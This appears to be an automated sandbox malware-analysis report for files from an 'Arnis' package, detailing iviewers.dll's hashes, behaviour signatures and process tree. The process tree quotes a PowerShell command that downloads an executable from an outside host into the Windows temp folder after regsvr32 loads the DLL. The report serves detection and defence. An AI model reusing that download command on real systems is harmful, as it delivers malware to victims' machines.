Overview
overview
10Static
static
3Arnis.exe
windows10-2004-x64
10Qt5Gui.dll
windows7-x64
3Qt5Gui.dll
windows10-2004-x64
3Qt5Svg.dll
windows7-x64
3Qt5Svg.dll
windows10-2004-x64
3args.js
windows7-x64
3args.js
windows10-2004-x64
3iviewers.dll
windows7-x64
3iviewers.dll
windows10-2004-x64
10main.js
windows7-x64
3main.js
windows10-2004-x64
3ssleay32.dll
windows7-x64
3ssleay32.dll
windows10-2004-x64
3world_editor.js
windows7-x64
3world_editor.js
windows10-2004-x64
3Analysis
-
max time kernel
121s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-01-2025 00:03
Static task
static1
Behavioral task
behavioral1
Sample
Arnis.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral2
Sample
Qt5Gui.dll
Resource
win7-20240903-en
Behavioral task
behavioral3
Sample
Qt5Gui.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral4
Sample
Qt5Svg.dll
Resource
win7-20241010-en
Behavioral task
behavioral5
Sample
Qt5Svg.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral6
Sample
args.js
Resource
win7-20240708-en
Behavioral task
behavioral7
Sample
args.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral8
Sample
iviewers.dll
Resource
win7-20240903-en
Behavioral task
behavioral9
Sample
iviewers.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral10
Sample
main.js
Resource
win7-20240903-en
Behavioral task
behavioral11
Sample
main.js
Resource
win10v2004-20241007-en
Behavioral task
behavioral12
Sample
ssleay32.dll
Resource
win7-20240903-en
Behavioral task
behavioral13
Sample
ssleay32.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral14
Sample
world_editor.js
Resource
win7-20240729-en
Behavioral task
behavioral15
Sample
world_editor.js
Resource
win10v2004-20241007-en
General
-
Target
iviewers.dll
-
Size
8KB
-
MD5
da9b36090cd0f8766f2127bc5c318389
-
SHA1
972f6a885512db3c5ae4330be4e81519d8e7884d
-
SHA256
b6edb1c17bbdafa08c1b97f0e0880f036937d5453c3dc06c7c24e34abe36f828
-
SHA512
702213d3d2955e58dc02468288891d29f69213b75fdb5f9aba27daf618bf1b8a3ff5ad96283945ead868d4f837641ea52273430207080e781221ee2294a728f6
-
SSDEEP
96:UXVV9kybtLHUkbpGDrA791djz3Jn6b7g303PRPFJygFE1H/8R:okybtLHuvG9vjz3J29RTygFE1H/u
Malware Config
Signatures
-
pid Process 2432 powershell.exe -
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2432 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2432 powershell.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 268 wrote to memory of 2816 268 regsvr32.exe 31 PID 2816 wrote to memory of 2432 2816 regsvr32.exe 32 PID 2816 wrote to memory of 2432 2816 regsvr32.exe 32 PID 2816 wrote to memory of 2432 2816 regsvr32.exe 32 PID 2816 wrote to memory of 2432 2816 regsvr32.exe 32
Processes
-
C:\Windows\system32\regsvr32.exeregsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll1⤵
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\SysWOW64\regsvr32.exe/s C:\Users\Admin\AppData\Local\Temp\iviewers.dll2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2816 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "iwr -useb 'https://moolaplace.com/arnireq.exe' -OutFile 'C:\Windows\Temp\txac5yzm.nhe.exe'"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2432
-
-